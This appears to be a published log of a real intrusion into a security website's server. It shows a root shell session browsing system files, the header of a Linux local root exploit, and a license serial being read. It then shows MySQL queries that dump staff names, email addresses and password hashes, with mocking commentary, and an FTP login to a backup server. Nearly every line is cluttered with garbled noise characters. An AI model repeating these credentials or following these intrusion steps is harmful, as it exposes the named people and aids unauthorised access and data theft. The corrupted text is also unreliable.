0 l9 w9 F- s3 s1 ^drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..$ p- h; G; y% H/ ?* a0 g* X C; l2 l
drwx—— 2 com com 4096 Jun 4 04:04 backups
2 t; F' K7 |; [9 o6 N, Y+ l8 R& Q-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
5 b& K ?, K9 j% U7 j. B9 ?drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system) Z4 `7 Y8 w+ x7 b# B
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
0 P4 \( Q1 q: M- H0 \-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout" v# I2 ]: w! }6 s
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
3 \% G) z, z2 _: B. x- [; D-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
0 A: }1 `4 d, C9 n- bdrwx–x–x 3 com com 4096 Jan 29 2008 domains, Q5 y v' `2 p1 I; Y. \
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
2 Z3 l8 [1 K% Q+ [0 Odrwxrwx— 3 com mail 4096 Jan 6 19:24 imap" N- d+ U7 ]7 a' q
-rw——- 1 com com 69 Nov 18 2008 .lesshst
6 V) G: S0 T) b8 I, Q0 mdrwx—— 2 com com 4096 Sep 24 2007 mail
% b( Y9 A8 I2 N; D2 H9 x-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
" l/ S! s- O( a' n8 P# H+ \5 V1 w$ s3 [drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
" [/ {; { z9 f+ ]- C+ wlrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html" k: I- @0 z. n/ E2 D* n+ I
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
3 z' k! t- f' Y1 fdrwx—— 2 com com 4096 Aug 26 2008 .ssh
! S/ v7 }% Y. }; r) w& H-rwx—— 1 com com 8515 Feb 10 2008 t
/ ]" H; t# O+ k1 O2 A, |8 v-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
$ c1 s3 H+ o9 Xdrwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
/ D. `! B! R0 G* Y( ^/ q7 x-rw-rw-r– 1 com com 617 May 20 2008 .toprc
3 R/ @+ M# z, R3 g( K* e; c- l1 X, p-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
0 R; y- N9 W$ {3 x; f-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
( `# n" _1 C# O7 z-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc8 l' L5 B8 U( N; B( d1 ~# q
# I' R& Y4 `9 ]5 L" Osh-3.2# head t.c' Y: t i" t9 s. Z P
/*
3 b/ J; Q7 x/ F1 p. V. i) @* jessica_biel_naked_in_my_bed.c1 M7 Q2 i2 g3 X; v
*
" a+ H" m5 s! J3 \6 ]" Y4 E% X* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
! ^5 h/ T$ P8 W/ q/ u' h* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.4 g( M) F: t' x+ q- w6 \
* Stejnak je to stare jak cyp a aj jakesyk rozbite." U3 c& d; ]; w& I1 r
*5 l* R5 G9 J/ G, ~2 [( U! C3 u! J
* Linux vmsplice Local Root Exploit4 x, |0 p* I4 M2 d8 C
* By qaaz
2 E8 Q" H* X0 b1 m4 h+ w*
9 X. Y# z8 A0 H& k2 H& V( G
8 w: p$ s5 n% A& _sh-3.2# cd /
7 C/ D% d0 O# psh-3.2# ls -la
; k& C! [2 ^/ ptotal 3605 i+ p" F! T. Y: b
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .
/ z1 P5 [9 p1 r4 R7 `drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
6 x6 I, Y; i7 m-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
1 P0 Y$ M( i1 T2 t. a+ v-rw——- 1 root root 10240 Jun 3 02:39 aquota.user/ B2 i& _2 ? z& p+ _3 ^
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
% H0 D2 B+ ?3 k-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
' S; f0 Z. o7 j) X/ Q+ B-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel$ q6 Z/ _6 Q2 v! m9 ]& B; [
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup5 ~2 q5 }' I2 S' E* r; D+ ~# z
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin% u: B( R& u: \
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
+ I" U$ a% ^3 X! u# Ndrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
! c0 S9 E0 X! h3 d. ydrwxr-xr-x 84 root root 12288 Jun 4 03:16 etc) p& C8 x h0 D. n
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home0 c5 I4 }/ Z/ F! ^- i+ {
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf- n/ v4 x- x. D/ o) [) @8 g! c2 U
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib) {& v$ c) e @# ~- a7 M" T
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64, b5 E4 x$ S7 v- c. L
drwx—— 2 root root 16384 Sep 11 2007 lost+found9 h* G% c* D9 ]1 T6 G+ W
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media" ? t+ @8 P) S- Q
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc
0 O" m$ g z) k0 Y9 t: h* l* gdrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
' ]9 \4 u! |' I! r4 c-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg1 i3 b* g& _9 f3 a
drwxr-xr-x 2 root root 0 Jun 3 02:43 net
. J# A3 O. d5 l# kdrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt. M- G$ m* b$ u" J3 M/ V5 |
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc/ \& O3 ^$ H+ ^" v' F2 z5 j
drwxr-x— 15 root root 4096 Jun 4 08:40 root
t! y2 q/ n a- \; H! _( Z+ ?3 ddrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin0 t' I: G1 B2 M3 z# p$ f7 S
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux4 x, [0 L* x: g8 p7 r
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
3 B& f) V4 S% D7 }9 C t1 Adrwxr-xr-x 11 root root 0 Jun 3 02:42 sys; r' m: H( p9 p3 ^* R' D0 @
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
' Q9 y# `3 n; u% o; Vdrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
% Y* t! o8 ]' d6 Kdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var. f" \9 C7 }/ u2 [. g
/ \# }0 L1 D6 w$ U& b
sh-3.2# cd opt
i q9 [; C& Wsh-3.2# ls -la
" Z6 @; {% d* Y" Ztotal 206 P' w0 f7 L& J1 x- R$ H5 b
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ." H2 J0 G H% r/ R. F7 ^ q2 h. {
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..1 L! c( c* @# |8 ]; e9 n+ L
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws+ B+ x4 Y+ V1 n" ~" ^5 M6 |0 X
1 l3 f; Q/ [% g( z* B: |7 Y$ R
sh-3.2# cd lsws/5 M- k- J/ _! |+ k+ F" s: m/ r
sh-3.2# ls -la
4 J# A5 S$ a, _6 T, A" htotal 1083 u( A2 H7 F( F p8 z1 N
drwxr-xr-x 15 root root 4096 Mar 20 2008 .
; H. n7 f/ C- M+ {drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
. `" X5 i, D9 p! t4 f( ^' T/ g2 Kdrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons3 e( w) f* L) F* R+ ^' c! @2 r
drwxr-xr-x 13 root root 4096 May 29 15:10 admin9 H; p0 Y% F P' _. b9 H
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate: q) x" D' p9 d+ O3 K. ~1 b+ P
drwxr-xr-x 2 root root 4096 May 29 15:10 bin& [0 s8 q# O0 I9 c8 A
drwx—— 4 apache apache 4096 Jun 3 02:43 conf
5 S7 H# R! t0 `$ |* [: L$ a1 Adrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT6 T1 o0 u( h3 v# ~2 ?4 r$ k; y! N
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
~0 b+ V! |, E, ?/ M# {" l4 U: ~% Fdrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
! {" s" H6 h7 F3 ndrwxr-xr-x 2 root root 4096 Sep 15 2008 lib8 @" ^- F4 o+ O4 i8 y) ^9 k( i" V# l
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
% Z$ u6 W- c8 D-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP/ U1 e$ u2 \2 [' S3 Q7 ~, r% \! F( j
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL/ U, W$ @" d+ m8 X& e) ?7 ^3 A
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP) g$ |/ H* Y/ p7 I( o$ C9 y
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
8 C# y3 \& |, H T7 V; rdrwxr-xr-x 2 root root 4096 Mar 20 2008 php
) ~- F* {# n' H$ \$ ]drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
4 [0 Q7 F5 \6 W, l g* ]drwxr-xr-x 3 root root 4096 Mar 20 2008 share
1 B5 S& @+ L9 h; E/ Q/ x4 z-rw-r–r– 1 root root 6 May 29 15:10 VERSION
) F2 @3 z& O$ L) |
- e0 D# x: ]5 m8 Q9 s b+ ^sh-3.2# cd conf1 S0 T4 P7 ~ h$ N
sh-3.2# ls -la5 F! E; n, C- f \' K
total 48
' t& F1 Z9 \- \) s/ O- xdrwx—— 4 apache apache 4096 Jun 3 02:43 ." S8 Q9 S$ A- M3 N9 p
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..0 r$ c7 f) O$ U+ h
drwx—— 2 apache apache 4096 Mar 20 2008 cert
% a9 s2 ~, a5 d8 h# k-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml# S; _& Q: h6 S/ R7 `3 i5 Q4 m
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak0 u6 S/ n; y% y+ d; b5 V
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
6 k q# `5 [5 i; Z# J/ K5 W$ ^-rw——- 1 apache apache 256 May 29 15:10 license.key/ Y7 G8 [. O0 a8 q. P! \
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old9 o6 G- l h$ {% {# L! l) G+ O% i# Z* [: Z
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties% {) D4 H5 o3 u1 ~/ f
-rw——- 1 apache apache 20 May 29 15:10 serial.no2 ]3 s L' V5 J! }/ ^
drwx—— 2 apache apache 4096 Mar 20 2008 templates
6 a) C' b* F4 w2 M* W2 x" A2 d; ]) z/ j0 p2 M0 r; H. @
sh-3.2# cat serial.no
1 z2 u. F( ^5 J+ m$ r LIbDl-oVsO-CKqL-wVRa
$ P, F3 w% V$ k) [' _+ B0 x7 [8 o
0 C( Q' V+ _$ g$ y# t& tsh-3.2# mysql O* |6 P: y8 x7 m% D
Welcome to the MySQL monitor. Commands end with ; or \g.
6 ]- k G1 y* v1 F- k' uYour MySQL connection id is 286844% ?$ J& m, \6 K" \) X
Server version: 5.0.45-community-log MySQL Community Edition (GPL). |2 e$ g" X9 D, g& b7 ~* r: G4 m
# J+ {4 {9 s% \
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
8 o8 R7 ^! e* b! U7 N8 S
+ H6 L2 g& p& k) lmysql> show databases;
. M# T$ P; k2 M+———————–+
& ~! {: o/ e; W+ t7 o0 I| Database |
9 h+ ~- m" W5 r+ f# A0 p+———————–+
% d) T$ F* h, j: m+ Y8 z+ V| information_schema |; T+ w' ?8 e% R
| astanet_ads |' [6 f0 l5 T7 R. c3 V
| astanet_mailing_lists |
$ Z) u" O" |9 C S* S3 K5 k5 W| astanet_mediawiki |
& k& S5 m( m/ d! B" k| astanet_membersystem |
! a6 K2 e% d, [4 E+ b: L' {| com_contrexx |
8 d+ c4 o2 |, A& r' O1 T| com_contrexx2 |* q/ B3 W2 ~3 Q& v& Q+ z, @$ \
| com_contrexx2_live |
/ Y) S0 s5 g% J. S| da_roundcube |
1 S. T6 F7 V- W8 B| dolphin |; i- c. c! m$ G3 x7 ^$ J4 d7 y* k+ s
| ideapool |
. h5 {$ [# y( ~0 @+ B+ b( \| mysql |( L' i4 T) o6 X7 y
| test |
! b0 ~" t' }# v' P+ x3 P+ ]2 b| yourmaster |% {! V. F Q- v6 Z# j
+———————–+9 i0 d$ }7 B/ S, y4 M
14 rows in set (0.00 sec)3 o$ W2 _( ^# G1 n( h
* x+ M" R3 M. I# V& @mysql> use ideapool
8 a0 K" O$ N$ k! c8 fDatabase changed
* ?# r t3 s& j T% o4 J; p# y5 L2 Ymysql> show tables;
% |4 b& L, `) n. M- \& H" ?+———————————–+- n7 Q: G/ h! {) R
| Tables_in_ideapool |
3 r! b. N) p6 I+ O3 n+———————————–+3 `4 H& u: j" c
| eventum_columns_to_display |
/ o Z7 b {3 \- I* x8 v' ~+ y1 W1 M| eventum_custom_field |$ m' p5 j' j- Q# k0 z6 X8 j
| eventum_custom_field_option |
# S2 X( T, X' J- w; i8 ]* A7 e| eventum_custom_filter |
2 Q' I$ T; j8 A+ A% _5 y$ u| eventum_customer_account_manager |
3 o5 n2 K8 K$ ]& D- ^. E$ G& I| eventum_customer_note |# k$ P, F1 T( M& Q) I" Q& i- f3 b
| eventum_email_account | x, L( d6 v/ v; u* }
| eventum_email_draft |. A7 N( I" v2 }% @4 F) _
| eventum_email_draft_recipient |
; h0 {1 J! J. M- M) v, d| eventum_email_response |
$ E- v+ j3 R: x h$ M: l| eventum_faq |3 v ? e; d% }. g8 A$ b2 B' F
| eventum_faq_support_level |
! M3 r3 `; t: k( F: {| eventum_group |( S) g! K3 z& |, J
| eventum_history_type |4 s0 X% h2 F0 ]5 X6 A
| eventum_irc_notice |1 c" E' S, b& H7 G
| eventum_issue |" {9 |3 t! ^' B% J
| eventum_issue_association |
7 j* F) v/ }4 N( X# h. a3 _| eventum_issue_attachment |5 }' J. W" Y" B3 C/ ]
| eventum_issue_attachment_file |
7 b. Z( L6 \ W7 G4 n( ^/ ?| eventum_issue_checkin |
) j; ]5 K8 [! l) W5 ^* \| eventum_issue_custom_field |
; h7 X+ T0 Q7 f6 R6 b| eventum_issue_history |4 @8 \7 f! x7 l
| eventum_issue_quarantine |/ S6 e( |- ], O3 K
| eventum_issue_requirement |
) R' ^& s6 g/ P| eventum_issue_user |0 Y% r. z4 r6 B4 {: G
| eventum_issue_user_replier |: _$ F( L1 n1 q! F' F
| eventum_link_filter |
6 i! l! j8 D) z; t" ^; q| eventum_mail_queue |
0 O7 m" ~/ E6 O$ U2 ^2 H, d| eventum_mail_queue_log |
( J2 a% ]; @$ [7 a. n! j) i3 q3 ~| eventum_news |
( N5 K3 @8 t& A" s8 y1 d| eventum_note |) t0 j$ L: K' w8 C5 ~+ @) @8 ]+ D
| eventum_phone_support |, N* F) B( Q( u( l0 A
| eventum_project |
4 h, N$ b ]: G& k1 F# j2 R| eventum_project_category |4 y& \0 {* m: h
| eventum_project_custom_field |
2 ?( `4 G' v: h' e- [ ?$ |1 ?( B1 ^| eventum_project_email_response |
; d7 |) Y1 U) w- O- P" b| eventum_project_field_display |
! N3 d8 f# P9 u9 i| eventum_project_group |
% C5 F# D+ R u8 u5 N2 [* e0 W| eventum_project_link_filter |* R2 W0 T# M# N; [2 k& i
| eventum_project_news |
# U! U, R& l+ i| eventum_project_phone_category |; |1 P) {- F5 l2 a; c* {3 v
| eventum_project_priority |! ], T1 k9 `; J& ]( o+ E$ W( B6 M
| eventum_project_release |
% C. G$ x% R# X6 i| eventum_project_round_robin |9 R1 u6 Z5 [ d$ p4 ^
| eventum_project_status |! P6 k. T9 a) I; H5 ]) T
| eventum_project_status_date |
" {* t7 F0 z9 T6 U* m8 D- _| eventum_project_user |! u6 L X5 x- U
| eventum_reminder_action |
; i3 N- D; X& H3 d: P! Q7 p) a| eventum_reminder_action_list |
) t, f# e f, j) k9 l7 t/ l. N6 Q| eventum_reminder_action_type |
- u" W |$ W2 L9 E! d3 Z| eventum_reminder_field |- y2 U1 G( B2 H
| eventum_reminder_history |9 l8 U( M7 H8 { P; X! c \0 @
| eventum_reminder_level |
, V5 p$ Q7 ?) s| eventum_reminder_level_condition |: \6 U, Z; }. x2 c
| eventum_reminder_operator |+ \: [3 f+ W6 a7 Y) k9 V
| eventum_reminder_priority |
- X/ q" g* [9 V, |4 v| eventum_reminder_requirement |
* Y( \8 L7 _+ w" f| eventum_reminder_triggered_action |
6 D- ]1 n7 \0 `% c| eventum_resolution |$ N% s* u0 Q, }
| eventum_round_robin_user |( \. e. k5 ~, Y8 d# p
| eventum_search_profile |) K( {: |8 ]1 r" Z# i6 m( @0 [
| eventum_status |9 d, L4 F; |. ~3 `2 @
| eventum_subscription |; Z$ K6 y3 B3 T7 u0 C3 S% K; S$ r
| eventum_subscription_type |
6 M- B% J3 }- R, o+ m| eventum_support_email |9 p, i; r2 m# @( `
| eventum_support_email_body |, K ]5 C7 \! W
| eventum_time_tracking |' ~+ n9 L- F- _' D
| eventum_time_tracking_category |3 @# V6 s( m5 B9 U6 c
| eventum_user |1 y# n" P9 P/ Z5 `+ u5 Q, M
+———————————–+% D+ Z0 V% z0 w4 R
69 rows in set (0.00 sec)
- P1 u+ M& y( h- G: m) n2 R. T# ]4 G/ P
mysql> describe eventum_user;
$ l l9 s1 Y- P3 S! k$ c+ g3 @+————————-+——————+——+—–+———————+—————-+ u" u. b0 U' C1 _+ V: l8 r- Z% C2 ~
| Field | Type | Null | Key | Default | Extra |
2 E! ~3 r8 t0 V4 f+ r6 ^+————————-+——————+——+—–+———————+—————-+
) M5 ~# b) l. P3 V: S| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |$ i, i1 \6 C6 d+ p2 X/ C3 H
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
( {) d( O4 X) b| usr_customer_id | int(11) unsigned | YES | | NULL | |
, P, O& Y( S) c| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |4 P3 V& P' M# r( ^% K6 h
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |9 _2 W) }6 r( r4 Y0 W3 r
| usr_status | varchar(8) | NO | | active | |
9 _2 C& {9 x# W4 y6 _| usr_password | varchar(32) | NO | | | |
2 `4 q$ R6 p) {) S| usr_full_name | varchar(255) | NO | | | |
( r' O h1 n" S( F| usr_email | varchar(255) | NO | UNI | | |- \; t8 E/ u) ^' t3 B3 @; `- L
| usr_preferences | longtext | YES | | NULL | |
; ~6 [0 ]7 r% h1 w4 N K# R| usr_sms_email | varchar(255) | YES | | NULL | |
: X( D K. \. x' T+ B4 B| usr_clocked_in | tinyint(1) | YES | | 0 | |) X* I+ A4 a% y$ f5 G# S- j
| usr_lang | varchar(5) | YES | | NULL | |
# a% d/ j) R5 |+————————-+——————+——+—–+———————+—————-+* e6 M% q8 H1 k& h: B
13 rows in set (0.00 sec)
# o$ Z* s7 f% m; G' q7 x
2 ^; _% e2 q9 Jmysql> select usr_full_name,usr_email,usr_password from eventum_user;
; v/ @) a Q" x6 A1 }+———————-+——————————-+———————————-+
3 g* G! T# F9 @' ]4 ?2 w' P| usr_full_name | usr_email | usr_password | o' ]+ `5 S: f/ y
+———————-+——————————-+———————————-+1 L. ^7 Z7 N: r m
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |% [( }& z9 ~- }0 W) h
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
3 E, p6 j% l) A| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |* W9 l3 A- H, H7 Y* h
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |6 o) U9 p9 n; U. N
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |9 }; `- J, d6 W$ ?8 m- t
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
# g) F: v* {8 b$ L/ e$ D| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
( j/ _, y4 n& ]" |: o; M| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |0 @( L0 S# T% \
| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |1 Z& `/ {* F8 p3 _# i$ S! r5 [
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
" m8 G/ y, }( Q2 }| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
: H/ ?$ e. b$ ?* I0 _+ J9 {| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |" O0 x5 o7 b& K8 U& i8 Y2 S
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
3 |6 N2 [' L1 A9 \& Q| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |# K% T# a. o8 O r/ P$ H
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |3 [4 o, s* ?( o1 ^& M. ?
+———————-+——————————-+———————————-+
! s# ~4 y3 i# J$ U/ s15 rows in set (0.00 sec)5 M( S8 H: C, |2 l. P3 [2 o
3 `$ a. W+ @& U* Q" F) d' |
mysql> select iss_description from eventum_issue where iss_id = 43;
7 v8 N( d7 ~+ e+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+) f- k/ A. D/ k4 f, ^ C0 m6 m
| iss_description 7 d/ O/ D* R0 ?5 j* b& W
|
& L1 P. K7 Y0 E+ w8 M: i; B9 i; b+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+ e' n+ v9 \9 r3 V
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
; v6 n7 }( v7 E( E* r" ^9 ?connected for 90 mins… 120mins… so what i propose is something like:; v9 C9 q2 W2 g: z7 v9 _
链接标记[url]http://www.surfthechannel.com/[/url]
7 p+ Z3 b8 z! r7 c9 [" r4 h: M, x8 h: Osince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
& q1 |3 t, A! f/ R; b& Llike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t: t$ [. a9 q( @5 m! i# a
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
; d' t+ G3 I: M$ @' G9 ]if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…, x* b, S! R" @/ s
& r# S9 @% i, i6 N) U
We could also put advertisement during play on the flash video player itself… extra $$…/ |5 n( E5 S% E1 K
+ d3 z9 v* V# I! d. h3 ]1 Z$ d0 XBy sykadul |
* O7 t+ Z3 w8 R6 a% Y+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
T& H1 \+ s0 p; C5 E( l: u1 row in set (0.00 sec)7 w& W+ \8 [; L' `. a, P4 i
7 c# d* ? N# O$ W. a3 z
// Money and extra $$ is all they care about. remember that.
. q# e! |$ I+ ]; T" a# q; q2 U
' o5 z; D$ ^$ p5 }% |9 \0 Z5 {mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
/ l0 ^& o( ]" N0 \' R+————————+——————————————————————————————————————————————————————————————————————————————-+7 x; o3 I- X- D; v% o! }, k
| iss_summary | iss_description . x/ g* `7 Z; T) U9 M, Z0 ?% [
|
* y5 U! |- k$ }" w: F/ Q9 A+————————+——————————————————————————————————————————————————————————————————————————————-+
. u, D9 ]# H. _% b" S| Forum for REAL EXPERTS | Hello,
- \" N& \; x4 x/ @0 q, ]
* @2 i9 e) f% ?8 z2 Q, pIshtus and I,+ A" P' ?8 d4 a
2 C, E; ~/ m* x; P" _0 o* Z5 ], v
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
9 ^1 l; [& M) v; vONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
: c/ X+ f7 ?: m% _" _3 a1 a" B6 s
6 [( e3 f( S+ n& u' Q0 M/ ?( q+ n5 YOne example a friend of mine from coresecurity.com!: u6 W# a% W+ u. V1 J; r
3 {7 K( A9 |* f5 c" KWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..8 Z# {% y* R$ g0 |
: p& l `& J( r: u1 g- I/ x9 f|* {9 d; r* q; e
+————————+——————————————————————————————————————————————————————————————————————————————+
; H& r3 @7 t k; i& E1 row in set (0.00 sec)( V4 C/ f+ E9 f, B- ^! l. |* _
, j7 p" ]; c( u. k// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
3 Z) F( e6 }, N! W; [3 {, v; q$ t$ E& m" H
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;9 J) W* _/ s6 s% F/ ]! O
+——————+———————————————————————————————+! i0 a, D2 M; i. x8 W, S
| iss_summary | iss_description |" E8 P/ {+ B+ l% r- E( k! B
+——————+———————————————————————————————+) D" C! ^, f$ n$ W5 R; d
| Website guidance | Virtual Girl which guides you trought the website.* |% D6 F/ V0 U, ]+ L& b
: }8 |* X. {; U) c, Q
We need a girl with who you can ( talk )!!!; L' N" u' x" G0 O* x$ n; y
Also for the News!* D; |; C1 z0 o- ^; w) s
So my suggestion is a girl who read you the news loud if you like!
0 ] m7 A7 `% v- x! H' eyou can choose between read yourselfe or she read it for you or both!1 j; A' f( N! s: d% N0 p3 {% u
( G5 Q6 Y+ W; I+ @2 B4 X/ P
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
& D4 G. F$ O+ y8 S0 P9 k, i6 c, W9 E* D+ Z
Have a look on the example girls!!7 k Z2 I5 {9 p8 Z
3 I" H" u1 b' d3 J% {5 @链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
+ M9 z& f+ E/ M7 @: t1 m0 ?' ]( N, J- O
or that
0 w# h, F" ?1 {$ T& P
; G2 |) h7 \. @, Q链接标记[url]http://www.yellostrom.de/[/url]
! l w, x5 C7 s& A+ Y7 n9 _; C# {- i# A5 ]# U6 V' f7 N+ b
|
# x7 k! ~6 ?& l4 R+——————+———————————————————————————————+, ], C5 T; ?5 k3 z* _
1 row in set (0.00 sec)
4 y7 h6 q3 K: S, B2 H& o2 q) M
1 Z% r1 u7 k2 M8 w& C% ~// ha ha.
+ O; C) }& W: X: l5 l. Y6 y( [* y8 {" h D. M& d
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
/ Y* o. Z I2 |( Y+————————–+———————————————————————————————————–+
3 V3 V! I/ w' }# p: ^# F+ Z| iss_summary | iss_description |' C4 {/ N6 y% K- q( c9 _! x1 N
+————————–+———————————————————————————————————–+. T- @6 ^% }, r0 W
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
9 [: `# b0 Q# N5 _/ _9 _+————————–+———————————————————————————————————–+0 }. @. a) U/ U& W+ }9 J% y
1 row in set (0.00 sec)
W$ K$ E9 K8 Z9 Z5 f J
& K d/ z$ p' ^// LOL.. o, Z2 Q, \1 X; h9 n
: P1 o& l! T# }0 S$ m7 b
mysql> exit# m1 A1 F1 e# @% Q+ N- ?
Bye3 i/ I2 S& a3 G/ x3 D- Q
4 s+ d* f) i; i4 R0 T9 a
sh-3.2# ftp 212.254.194.1638 {# H, ^0 |! D2 |* w6 T: R
Connected to 212.254.194.163.
$ {) A* k: h. O+ V% `0 b# B/ G220 BackupCOM_VW FTP server ready.1 ?% ] \) m8 G; _# i+ [
504 AUTH: security mechanism ‘GSSAPI’ not supported.8 w1 @! U# ?) u2 n2 p' G8 i* W( w
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.! ~* S/ r" ~5 Z; y9 D& E0 Y
KERBEROS_V4 rejected as an authentication type4 _8 h! x7 F$ y# V8 w
Name (212.254.194.163:root): astalavista.com
9 x1 ^, F9 Y4 d: q' C331 Password required for astalavista.com.
! A& r) J# |" V, F5 M( g& SPassword:: R4 Z) m" F2 k& H0 R" i; M) Q3 D
230 User astalavista.com logged in.
/ i# T; v- ~. Y) B" H+ e0 \; QRemote system type is UNIX.* z% `. D( p8 W3 w; `# B
Using binary mode to transfer files." i/ G0 L1 U- F4 o' q* K
ftp> ls -la; f- D+ k0 A7 n& H0 @
227 Entering Passive Mode (212,254,194,163,2,188)- [9 L# J+ a$ I8 W! f! }" p
150 Opening BINARY mode data connection for ‘file list’.% f5 _5 Z. b' C( c
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
4 m" m0 i/ o( A) J; Q/ W7 [226 Transfer complete.2 `( r' Y# d, ~3 \
ftp> cd astalavista.com
